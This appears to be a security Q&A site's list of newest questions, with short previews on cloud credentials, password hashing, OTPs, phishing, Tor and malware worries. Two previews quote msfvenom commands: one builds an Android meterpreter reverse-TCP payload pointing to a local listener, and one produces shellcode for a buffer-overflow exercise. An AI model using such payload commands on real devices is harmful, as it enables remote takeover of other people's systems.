Newest Questions

0 votes
0 answers
42 views

Is it possible to insert hidden code using UTF-8 or UTF-16 that rearranges a sequence of executable ASCII letters (first a UTF-16 character that rearranges the letters off-screen could be interpreted as ...
loud_flash
0 votes
0 answers
25 views

To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
DevelJoe
1 vote
0 answers
28 views

I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
Eray Halidov
0 votes
1 answer
45 views

I use msfvenom-generated shellcode in a buffer overflow. Here's the command that I used to create shellcode for Linux x64: msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami and here's ...
CyberCr0w
0 votes
1 answer
40 views

I have recently added CSP headers to a rather complex web application, being -report-only at first. I got some noise from browser extensions in the report, but two incidents caught my eye especially: ...
cis
1 vote
0 answers
30 views

I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also? I saw that it can attack during a phone update download. If the update has downloaded ...
Master Baiter
1 vote
0 answers
71 views

I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
Dolda2000
1 vote
0 answers
77 views

Until now, I have been using a VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
zbroqvfuktscvn
0 votes
0 answers
57 views

Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean? I know there are some similar ...
0 votes
0 answers
13 views

I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global. Usually, a system-related program would go in /...
DannyNiu
0 votes
0 answers
24 views

I want to know how secure the package lm-sensors is. I need to monitor the temperature of my machine to adapt the configuration of the fans. The program prompts me for my root password to access ...
Yoh
0 votes
0 answers
26 views

I want your advice on a cybersecurity career. I have 3 years of experience as a full-stack developer and I think I gave some love to all things related to DevOps, Linux and cybersecurity, so I ...
php_learn
0 votes
0 answers
24 views

I tried to search the web for existing projects, but after failed attempts, I decided to code something my own way, one approach, open to comments and improvements: #!/usr/bin/env python3 import ...
Gilles Quénot
0 votes
0 answers
34 views

This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
Towrope
0 votes
1 answer
91 views

I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
In Hoc Signo
0 votes
0 answers
20 views

I discovered ExtAnalysis, tried to run it in a Docker container, but it seems that this project is abandoned. There are too many errors. Some issues have been open since 2023 in the repository. So my ...
Gilles Quénot
-1 votes
0 answers
48 views

During the change of clock due to daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour after the time of change of the clock. Why do they ...
Space.yg
0 votes
0 answers
18 views

I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret. The secret is on a file called .env (I found it in a different way), but I wonder why ...
Μenelaοs
0 votes
1 answer
200 views

I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
Sam Coutteau
5 votes
1 answer
812 views

I noticed that with the Linux pam-u2f module, whether you are required to input your PIN can be changed by simply editing the ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
ojs
6 votes
1 answer
612 views

Apple claims that a one-time token is created. What is the purpose of that token? What happens with that token? As far as I know, when I pay with my physical debit card, the information passed the POS ...
ilhan
0 votes
1 answer
40 views

My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future. One potential client has us using their ...
Magellan Jim
7 votes
3 answers
2k views

I use SMS for MFA (yes I know it's bad, but better than no MFA) in a web application. On login an OTP is sent to the user via SMS. This OTP is valid until: it expires after 10 minutes it is ...
Martin
0 votes
0 answers
21 views

How does Defender for Cloud interpret and normalize these logs? In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP. ...
Sabari A
0 votes
1 answer
62 views

When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform? Does ...
Desperado
1 vote
0 answers
46 views

I have an application, myapplication.exe. Through the IFEO registry I can attach a debugger, which can be a malicious piece of software for an attacker. Only someone having access to Windows registry can ...
Jyothish Bhaskaran
0 votes
0 answers
56 views

A user accidentally clicked a link in a phishing email. The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
maruf
0 votes
1 answer
97 views

In PHP I am generating a unique random token used as a code and index for password resets: declare(strict_types=1); namespace App\Domain\Helper; use Ramsey\Uuid\Uuid; use Random\RandomException; ...
Dimitrios Desyllas
0 votes
0 answers
4 views

Is there any method to forensically analyse Android mobile memory without rooting the phone? I want to capture malware in my Android phone.
Reza Haider
0 votes
3 answers
98 views

I am using the following approach for a time-limited OTP used in my PHP app using a pseudorandom generator: $otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT); Then upon the User I store:...
Dimitrios Desyllas
